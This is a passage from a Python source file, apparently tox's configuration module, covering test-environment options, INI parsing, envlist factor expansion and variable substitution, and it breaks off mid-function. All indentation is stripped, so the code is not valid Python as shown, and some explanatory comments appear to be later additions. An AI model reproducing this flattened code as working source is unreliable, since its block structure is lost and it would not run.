match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
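# Added note (illustrative): for a factor such as "py38" the regexp above yields
# base_exe "python" and version "3.8", so the implied interpreter is "python3.8";
# a bare "py" factor implies plain "python". A mismatch between the implied and
# the configured basepython triggers the warning above unless
# ignore_basepython_conflict is set.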
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
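# Example (illustrative): with
#   [testenv]
#   passenv = TRAVIS_* SECRET_TOKEN
# every invocation-environment variable whose name matches TRAVIS_* (case-insensitive
# fnmatch) plus SECRET_TOKEN is copied into the test environment, in addition to the
# defaults collected above and any names listed in TOX_TESTENV_PASSENV.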
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Prior to 2.8.1, missing substitutions crashed with a ConfigError even when the env was
not part of the current test run. So we remember them here and check later, when the
testenv is actually run, and only then crash.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(distshare=config.distshare)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, we now need to do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
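# Example (illustrative): _split_factor_expr("py37-!cov") returns
# [({"py37"}, {"cov"})] -- the first set holds required factors, the second the
# negated ("!") factors that must be absent for a conditional line to apply.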
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = re.split(r"((?:\{[^}]+\})+)|,", envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = re.split(r"\{([^}]+)\}", env)
parts = [re.sub(r"\s+", "", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
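# Example (illustrative): _expand_envstr("py{27,36}-django{15,16}") yields
# ["py27-django15", "py27-django16", "py36-django15", "py36-django16"], i.e. the
# cartesian product of every brace group; commas outside braces separate envs.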
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# Factors need to be applied before unwrapping
# dependencies, otherwise the substitution process
# can break. Once they are unwrapped, we apply
# factors again for the newly introduced dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = re.search(r"^([\w{}\.!,-]+)\:\s+(.+)", line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
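# Forms handled above (illustrative summary): plain keys such as {toxinidir},
# environment lookups {env:HOME} or {env:HOME:fallback}, cross-section references
# like {[base]commands}, {tty:on_value:off_value}, and the bare "{:}" which expands
# to os.pathsep, while {opts} and {packages} are deliberately left intact.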
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
